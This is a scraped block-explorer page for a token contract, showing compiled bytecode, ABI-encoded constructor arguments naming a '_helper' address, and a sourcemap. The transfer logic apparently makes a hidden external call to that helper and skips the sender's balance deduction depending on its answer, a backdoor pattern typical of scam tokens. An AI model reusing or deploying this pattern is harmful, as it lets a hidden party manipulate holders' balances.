872dd60e01b81526001600160a01b038881166004830152878116602483015260448201879052929450909250908216906323b872dd906064016020604051808303815f875af11580156107aa573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107ce9190610add565b61080e576001600160a01b0385165f908152602081905260409020546107f5908490610afc565b6001600160a01b0386165f908152602081905260409020555b6001600160a01b0384165f9081526020819052604081208054859290610835908490610aa7565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161088191815260200190565b60405180910390a35050505050565b6006546001600160a01b031633146103105760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161038a565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b5f6020808352835180828501525f5b818110156109665785810183015185820160400152820161094a565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461044d575f80fd5b5f80604083850312156109ab575f80fd5b82356109b681610986565b946020939093013593505050565b5f805f606084860312156109d6575f80fd5b83356109e181610986565b925060208401356109f181610986565b929592945050506040919091013590565b5f60208284031215610a12575f80fd5b8135610a1d81610986565b9392505050565b5f8060408385031215610a35575f80fd5b8235610a4081610986565b91506020830135610a5081610986565b809150509250929050565b600181811c90821680610a6f57607f821691505b602082108103610a8d57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b808201808211156102b5576102b5610a93565b5f8060408385031215610acb575f80fd5b825191506020830151610a5081610986565b5f60208284031215610aed575f80fd5b81518015158114610a1d575f80fd5b818103818111156102b5576102b5610a9356fea264697066735822122063df2d8ef4d5c25fa56dfeae79f824669f5a6eb2a26e9ecee8ecf91b048ab45364736f6c63430008140033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000040ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000090364bae4b572802c2d72c353ca6898d6929219c

-----Decoded View---------------
Arg [0] : _helper (bytes): 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000090364bae4b572802c2d72c353ca6898d6929219c

-----Encoded View---------------
4 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000020
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [2] : ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
Arg [3] : 00000000000000000000000090364bae4b572802c2d72c353ca6898d6929219c


Deployed Bytecode Sourcemap

20582:199:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9714:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12074:201;;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;12074:201:0;1023:187:1;10843:108:0;10931:12;;10843:108;;;1361:25:1;;;1349:2;1334:18;10843:108:0;1215:177:1;12855:261:0;;;;;;:::i;:::-;;:::i;10685:93::-;;;10768:2;2000:36:1;;1988:2;1973:18;10685:93:0;1858:184:1;13525:238:0;;;;;;:::i;:::-;;:::i;11014:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;11115:18:0;11088:7;11115:18;;;;;;;;;;;;11014:127;3091:103;;;:::i;:::-;;2450:87;2523:6;;2450:87;;-1:-1:-1;;;;;2523:6:0;;;2445:51:1;;2433:2;2418:18;2450:87:0;2299:203:1;9933:104:0;;;:::i;14266:436::-;;;;;;:::i;:::-;;:::i;11347:193::-;;;;;;:::i;:::-;;:::i;11603:151::-;;;;;;:::i;:::-;;:::i;3349:201::-;;;;;;:::i;:::-;;:::i;9714:100::-;9768:13;9801:5;9794:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9714:100;:::o;12074:201::-;12157:4;1081:10;12213:32;1081:10;12229:7;12238:6;12213:8;:32::i;:::-;12263:4;12256:11;;;12074:201;;;;;:::o;12855:261::-;12952:4;1081:10;13010:38;13026:4;1081:10;13041:6;13010:15;:38::i;:::-;13059:27;13069:4;13075:2;13079:6;13059:9;:27::i;:::-;-1:-1:-1;13104:4:0;;12855:261;-1:-1:-1;;;;12855:261:0:o;13525:238::-;13613:4;1081:10;13669:64;1081:10;13685:7;13722:10;13694:25;1081:10;13685:7;13694:9;:25::i;:::-;:38;;;;:::i;:::-;13669:8;:64::i;3091:103::-;2336:13;:11;:13::i;:::-;3156:30:::1;3183:1;3156:18;:30::i;:::-;3091:103::o:0;9933:104::-;9989:13;10022:7;10015:14;;;;;:::i;14266:436::-;14359:4;1081:10;14359:4;14442:25;1081:10;14459:7;14442:9;:25::i;:::-;14415:52;;14506:15;14486:16;:35;;14478:85;;;;-1:-1:-1;;;14478:85:0;;3749:2:1;14478:85:0;;;3731:21:1;3788:2;3768:18;;;3761:30;3827:34;3807:18;;;3800:62;-1:-1:-1;;;3878:18:1;;;3871:35;3923:19;;14478:85:0;;;;;;;;;14599:60;14608:5;14615:7;14643:15;14624:16;:34;14599:8;:60::i;11347:193::-;11426:4;1081:10;11482:28;1081:10;11499:2;11503:6;11482:9;:28::i;11603:151::-;-1:-1:-1;;;;;11719:18:0;;;11692:7;11719:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11603:151::o;3349:201::-;2336:13;:11;:13::i;:::-;-1:-1:-1;;;;;3438:22:0;::::1;3430:73;;;::::0;-1:-1:-1;;;3430:73:0;;4155:2:1;3430:73:0::1;::::0;::::1;4137:21:1::0;4194:2;4174:18;;;4167:30;4233:34;4213:18;;;4206:62;-1:-1:-1;;;4284:18:1;;;4277:36;4330:19;;3430:73:0::1;3953:402:1::0;3430:73:0::1;3514:28;3533:8;3514:18;:28::i;:::-;3349:201:::0;:::o;18103:346::-;-1:-1:-1;;;;;18205:19:0;;18197:68;;;;-1:-1:-1;;;18197:68:0;;4562:2:1;18197:68:0;;;4544:21:1;4601:2;4581:18;;;4574:30;4640:34;4620:18;;;4613:62;-1:-1:-1;;;4691:18:1;;;4684:34;4735:19;;18197:68:0;4360:400:1;18197:68:0;-1:-1:-1;;;;;18284:21:0;;18276:68;;;;-1:-1:-1;;;18276:68:0;;4967:2:1;18276:68:0;;;4949:21:1;5006:2;4986:18;;;4979:30;5045:34;5025:18;;;5018:62;-1:-1:-1;;;5096:18:1;;;5089:32;5138:19;;18276:68:0;4765:398:1;18276:68:0;-1:-1:-1;;;;;18357:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18409:32;;1361:25:1;;;18409:32:0;;1334:18:1;18409:32:0;;;;;;;18103:346;;;:::o;18740:419::-;18841:24;18868:25;18878:5;18885:7;18868:9;:25::i;:::-;18841:52;;-1:-1:-1;;18908:16:0;:37;18904:248;;18990:6;18970:16;:26;;18962:68;;;;-1:-1:-1;;;18962:68:0;;5370:2:1;18962:68:0;;;5352:21:1;5409:2;5389:18;;;5382:30;5448:31;5428:18;;;5421:59;5497:18;;18962:68:0;5168:353:1;18962:68:0;19074:51;19083:5;19090:7;19118:6;19099:16;:25;19074:8;:51::i;:::-;18830:329;18740:419;;;:::o;15172:650::-;-1:-1:-1;;;;;15269:18:0;;15261:68;;;;-1:-1:-1;;;15261:68:0;;5728:2:1;15261:68:0;;;5710:21:1;5767:2;5747:18;;;5740:30;5806:34;5786:18;;;5779:62;-1:-1:-1;;;5857:18:1;;;5850:35;5902:19;;15261:68:0;5526:401:1;15261:68:0;-1:-1:-1;;;;;15348:16:0;;15340:64;;;;-1:-1:-1;;;15340:64:0;;6134:2:1;15340:64:0;;;6116:21:1;6173:2;6153:18;;;6146:30;6212:34;6192:18;;;6185:62;-1:-1:-1;;;6263:18:1;;;6256:33;6306:19;;15340:64:0;5932:399:1;15340:64:0;15469:9;15480:22;15517:7;15506:39;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;15561:53;;-1:-1:-1;;;15561:53:0;;-1:-1:-1;;;;;6919:15:1;;;15561:53:0;;;6901:34:1;6971:15;;;6951:18;;;6944:43;7003:18;;;6996:34;;;15468:77:0;;-1:-1:-1;15468:77:0;;-1:-1:-1;15561:35:0;;;;;;6836:18:1;;15561:53:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;15556:129;;-1:-1:-1;;;;;15649:15:0;;:9;:15;;;;;;;;;;;:24;;15667:6;;15649:24;:::i;:::-;-1:-1:-1;;;;;15631:15:0;;:9;:15;;;;;;;;;;:42;15556:129;-1:-1:-1;;;;;15697:13:0;;:9;:13;;;;;;;;;;:23;;15714:6;;15697:9;:23;;15714:6;;15697:23;:::i;:::-;;;;;;;;15753:2;-1:-1:-1;;;;;15738:26:0;15747:4;-1:-1:-1;;;;;15738:26:0;;15757:6;15738:26;;;;1361:25:1;;1349:2;1334:18;;1215:177;15738:26:0;;;;;;;;15250:572;;15172:650;;;:::o;2615:132::-;2523:6;;-1:-1:-1;;;;;2523:6:0;1081:10;2679:23;2671:68;;;;-1:-1:-1;;;2671:68:0;;7658:2:1;2671:68:0;;;7640:21:1;;;7677:18;;;7670:30;7736:34;7716:18;;;7709:62;7788:18;;2671:68:0;7456:356:1;3710:191:0;3803:6;;;-1:-1:-1;;;;;3820:17:0;;;-1:-1:-1;;;;;;3820:17:0;;;;;;;3853:40;;3803:6;;;3820:17;3803:6;;3853:40;;3784:16;;3853:40;3773:128;3710:191;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2047:247::-;2106:6;2159:2;2147:9;2138:7;2134:23;2130:32;2127:52;;;2175:1;2172;2165:12;2127:52;2214:9;2201:23;2233:31;2258:5;2233:31;:::i;:::-;2283:5;2047:247;-1:-1:-1;;;2047:247:1:o;2507:388::-;2575:6;2583;2636:2;2624:9;2615:7;2611:23;2607:32;2604:52;;;2652:1;2649;2642:12;2604:52;2691:9;2678:23;2710:31;2735:5;2710:31;:::i;:::-;2760:5;-1:-1:-1;2817:2:1;2802:18;;2789:32;2830:33;2789:32;2830:33;:::i;:::-;2882:7;2872:17;;;2507:388;;;;;:::o;2900:380::-;2979:1;2975:12;;;;3022;;;3043:61;;3097:4;3089:6;3085:17;3075:27;;3043:61;3150:2;3142:6;3139:14;3119:18;3116:38;3113:161;;3196:10;3191:3;3187:20;3184:1;3177:31;3231:4;3228:1;3221:15;3259:4;3256:1;3249:15;3113:161;;2900:380;;;:::o;3285:127::-;3346:10;3341:3;3337:20;3334:1;3327:31;3377:4;3374:1;3367:15;3401:4;3398:1;3391:15;3417:125;3482:9;;;3503:10;;;3500:36;;;3516:18;;:::i;6336:320::-;6423:6;6431;6484:2;6472:9;6463:7;6459:23;6455:32;6452:52;;;6500:1;6497;6490:12;6452:52;6529:9;6523:16;6513:26;;6582:2;6571:9;6567:18;6561:25;6595:31;6620:5;6595:31;:::i;7041:277::-;7108:6;7161:2;7149:9;7140:7;7136:23;7132:32;7129:52;;;7177:1;7174;7167:12;7129:52;7209:9;7203:16;7262:5;7255:13;7248:21;7241:5;7238:32;7228:60;;7284:1;7281;7274:12;7323:128;7390:9;;;7411:11;;;7408:37;;;7425:18;;:::i

Swarm Source

ipfs://63df2d8ef4d5c25fa56dfeae79f824669f5a6eb2a26e9ecee8ecf91b048ab453
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.